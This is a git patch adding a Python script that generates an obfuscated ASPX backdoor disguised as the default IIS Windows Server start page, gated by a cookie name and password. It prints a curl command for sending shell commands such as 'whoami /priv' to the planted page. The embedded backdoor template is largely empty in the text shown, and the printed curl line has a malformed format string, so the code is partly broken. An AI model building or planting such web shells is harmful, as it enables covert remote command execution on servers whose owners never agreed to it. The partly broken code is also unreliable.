From 590afad8001ab4a4f2f1be2202da5c2dc8bcd3e2 Mon Sep 17 00:00:00 2001 From: heqnx Date: Tue, 13 May 2025 21:50:38 +0300 Subject: added simple aspx backdoor with iis template --- aspx-backdoor.py | 135 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 135 insertions(+) create mode 100644 aspx-backdoor.py diff --git a/aspx-backdoor.py b/aspx-backdoor.py new file mode 100644 index 0000000..1b53ade --- /dev/null +++ b/aspx-backdoor.py @@ -0,0 +1,135 @@ +#!/usr/bin/env python3 + +import os +import re +import random +import string +from textwrap import dedent +from argparse import ArgumentParser + +def obfuscate(s): + pattern = r'\{\*(.*?)\*\}' + placeholder_values = {} + + def get_or_generate_random_string(match): + placeholder = match.group(1) + if placeholder not in placeholder_values: + placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8)) + return placeholder_values[placeholder] + + result_string = re.sub(pattern, get_or_generate_random_string, s) + + return result_string + +def generate_aspx_backdoor(args): + code = '200' + status = '200 OK' + iisstart_template = ''' + + + +IIS Windows Server + + + +
+IIS +
+ +''' + lines = iisstart_template.split('\n') + processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines] + response = '\n'.join(processed_lines) + response = response.rstrip(' & vbCrLf & _') + + backdoor = f'''<%@ Page Language="VB" Debug="true" %> +<%@ Import Namespace="System.IO" %> +<%@ Import Namespace="System.Diagnostics" %> +<%@ Import Namespace="System.Web" %> + +''' + + with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh: + fh.write(obfuscate(backdoor)) + + print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"') + print('[INFO] issue commands with:') + print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST') + + +if __name__ == '__main__': + parser = ArgumentParser() + parser.add_argument('-c', '--cookie-name', required=True) + parser.add_argument('-p', '--password', required=True) + args = parser.parse_args() + + generate_aspx_backdoor(args) + -- cgit v1.2.3